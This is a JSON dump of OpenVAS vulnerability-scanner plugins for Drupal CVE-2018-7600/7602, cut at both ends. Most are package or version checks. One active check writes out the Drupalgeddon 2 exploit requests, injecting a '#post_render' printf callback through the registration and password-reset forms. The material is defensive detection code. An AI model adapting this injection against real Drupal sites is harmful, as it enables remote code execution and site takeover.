See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891325\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian LTS: Security Advisory for drupal7 (DLA-1325-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"summary\", value:\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. 
This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u18\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:32", "description": "A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4156-1 (drupal7 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4156-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704156\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian Security Advisory DSA 4156-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4156.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_xref(name:\"URL\", 
value:\"https://security-tracker.debian.org/tracker/drupal7\");\n script_tag(name:\"summary\", value:\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u3\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.32-1+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-16T15:52:02", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-14T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310108438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108438", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in 
the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:drupal:drupal\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108438\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-04-14 13:29:22 +0200 (Sat, 14 Apr 2018)\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\");\n script_mandatory_keys(\"drupal/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", 
value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to a critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends crafted HTTP POST requests which inject a printf #post_render callback and checks whether the response starts with the injected random marker. This is an active check (ACT_ATTACK) that executes the harmless printf callback on the target.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9, 8.4.6, 8.5.1,\n 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! 
dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\ncheck = rand_str( length:16 );\n# nb: URL rewriting on/off\nurls = make_list( dir + \"/user/register\", dir + \"/?q=user/register\" );\n\nforeach url( urls ) {\n\n url = url + \"?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax\";\n data = \"form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]=\" + check;\n req = http_post_put_req( port:port, url:url, data:data,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n # neNWIz2mlhti89hQ[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"16\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['\"HTTP POST\" body'] = data;\n info['URL'] = http_report_vuln_url( port:port, url:url, url_only:TRUE );\n\n report = 'By doing the following request:\\n\\n';\n report += text_format_table( array:info ) + '\\n\\n';\n report += 'it was possible to execute the \"printf\" command.';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\n# Drupal 7\n# This needs 2 requests (see e.g. 
https://github.com/FireFart/CVE-2018-7600/blob/master/poc.py)\nurl1 = dir + \"/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=printf&name%5B%23markup%5D=\"+ check +\n \"&name%5B%23typ\";\ndata1 = \"form_id=user_pass&_triggering_element_name=name\";\n\nreq = http_post_put_req( port:port, url:url1, data:data1,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\nbuild_id = eregmatch( pattern:'<input type=\"hidden\" name=\"form_build_id\" value=\"([^\"]+)\" />', string:res );\nif( ! isnull( build_id[1] ) ) {\n url2 = dir + \"/?q=file%2Fajax%2Fname%2F%23value%2F\" + build_id[1];\n data2 = \"form_build_id=\" + build_id[1];\n req = http_post_put_req( port:port, url:url2, data:data2,\n add_headers:make_array( \"Content-Type\", \"application/x-www-form-urlencoded\" ) );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n\n # wz8rLLg_3Uie91Rg[{\"command\":\"settings\",\"settings\":{\"basePath\":\"...\n if( egrep( string:res, pattern:\"^\" + check + \"\\[\\{\" ) ) {\n\n info['Req 1: \"HTTP POST\" body'] = data1;\n info['Req 1: URL'] = http_report_vuln_url( port:port, url:url1, url_only:TRUE );\n info['Req 2: \"HTTP POST\" body'] = data2;\n info['Req 2: URL'] = http_report_vuln_url( port:port, url:url2, url_only:TRUE );\n\n report = 'By doing the following subsequent requests:\\n\\n';\n report += text_format_table( array:info ) + '\\n\\n';\n report += 'it was possible to execute the \"printf\" command to return the data \"' + check + '\".';\n report += '\\n\\nResult:\\n\\n' + res;\n\n expert_info = 'Request:\\n'+ req + 'Response:\\n' + res + '\\n';\n security_message( port:port, data:report, expert_info:expert_info );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, 
"published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141028", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141028\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Linux, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. 
This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "Drupal is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310141029", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310141029", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-004_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141029\");\n script_version(\"$Revision: 12012 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-26 08:47:32 +0700 (Thu, 26 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-7602\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Drupal Core Critical 
Remote Code Execution Vulnerability (SA-CORE-2018-004) (Windows, Version Check)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Drupal is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists within multiple subsystems of\n Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which\n could result in the site being compromised. This vulnerability is related to SA-CORE-2018-002 (CVE-2018-7600).\");\n\n script_tag(name:\"affected\", value:\"Drupal 7.x and 8.x\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.59, 8.4.8, 8.5.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-004\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE)) {\n exit(0);\n}\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, version_regex:\"^[0-9]\\.[0-9.]+\", exit_no_version: TRUE)) {\n exit(0);\n}\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0\", test_version2: \"7.58\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.59\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.0\", test_version2: \"8.4.7\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.4.8\", install_path: path);\n 
security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5\", test_version2: \"8.5.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.3\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-b9ad458866", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874421", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_b9ad458866_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-b9ad458866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874421\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:21 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-b9ad458866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GYT7R43FLLEEG4N2QS3FDGZ3NNHOL3HL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-6a0717dc9a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875500", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875500\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-08 04:12:02 +0100 (Fri, 08 Mar 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-6a0717dc9a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6a0717dc9a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal8' package(s) announced via the FEDORA-2019-6a0717dc9a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", 